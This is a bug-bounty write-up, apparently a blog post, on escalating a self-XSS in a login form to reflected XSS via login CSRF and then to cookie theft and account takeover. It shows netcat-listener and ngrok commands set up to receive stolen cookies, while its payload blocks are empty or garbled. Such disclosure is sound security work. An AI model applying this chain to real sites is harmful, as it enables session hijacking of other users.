--- description: >- source: https://melguerdawi.medium.com/from-self-xss-to-account-take-over-ato-812c194b61cf --- # 🔎 From Self XSS to Account Take Over(ATO)

Hello there , I’m Mostafa Elguerdawi, Today , I would like to share about one of my recent finding in [HackerOne](https://medium.com/u/6f816e37be2c?source=post\_page-----812c194b61cf--------------------------------) ‘s program Let’s say : https://[reacted.com](https://reacted.com/) When I’m testing on this site, there is a login function, as normal I tried login bypass using Response Manipulation, Default Credentials, and SQL Injection. but nothing work, I decided to examine the source code and found of the username that I entered a little while ago printed inside the value attribute.

I thought about trying an XSS injection so, I attempted to inject a double quote(“) within the username, I found that there is no filtering on it.

So, I thought about injecting ‘<’, which might also work.

Indeed, it worked! So, I attempted to injecting a complete payload : ``` ">

Unfortunately, this is a self-XSS ## Escalation phase I ran my Burp Suite and intercepted the request during the login attempt.

From the request, I noticed that there is no protection against CSRF, which is expected from a login function. I attempted to escalate the self-XSS to reflected XSS using CSRF. The payload used : ``` ```

Yes, it worked! with the help of ngrok, I managed to obtain anyone’s cookies I opened two terminal tabs first : ngrok http 80

second : sudo nc -nlvp 80

I used this payload in username : > _\"\ > \\ \"_ _\"\ : is a double quote and white space encoded in html_ This payload retrieves the user’s cookies and sends them to me. With the help of netcat(nc), I can obtain these cookies. final payload : ``` ```

Finally, I managed to obtain the cookies.